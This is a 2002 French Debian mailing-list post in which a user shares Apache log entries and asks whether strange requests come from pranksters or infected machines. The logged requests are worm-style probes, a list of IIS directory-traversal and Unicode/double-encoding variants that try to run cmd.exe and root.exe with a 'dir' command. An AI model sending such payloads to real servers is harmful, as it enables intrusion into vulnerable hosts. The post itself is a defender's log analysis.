(OT) Des requetes http bizaroïdes...

To: Debian Liste Française <debian-user-french@lists.debian.org>
Subject: (OT) Des requetes http bizaroïdes...
From: Dabowl <bda@free.fr>
Date: 06 Feb 2002 15:01:31 +0100
Message-id: <[🔎] 1013004093.559.4.camel@debG4>

Bonjour,

En analysant les logs d'apache ce matin, je me suis aperçu de quelque
chose plûtot étrange.

grep -c "Feb/2002" access.log donne 3482 résultats.

Jugez plûtot les requêtes:


80.11.49.96 - - [06/Feb/2002:14:45:39 +0100] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 274 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:45 +0100] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:48 +0100] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-"
"-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
"-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-"
"-"

Y a des petits malin ou c'est des machines contaminées par 
quelquechose ?

Reply to:

Follow-Ups:
- Re: (OT) Des requetes http bizaroïdes...
  - From: MadCoder <pierre.habouzit@m4x.org>
- Re: (OT) Des requetes http bizaroïdes...
  - From: Thierry Louarn <thierry.louarn@zeni.fr>
- Re: (OT) Des requetes http bizaroïdes...
  - From: Amaury AL <amaury@mandrakesoft.com>
- Re: (OT) Des requetes http bizaroïdes...
  - From: Bruno Adele <b_adele@netcourrier.com>

Prev by Date: Re: Firewall ipchains VS iptables
Next by Date: Re: (OT) Des requetes http bizaroïdes...
Previous by thread: Re: Firewall ipchains VS iptables
Next by thread: Re: (OT) Des requetes http bizaroïdes...
Index(es):
- Date
- Thread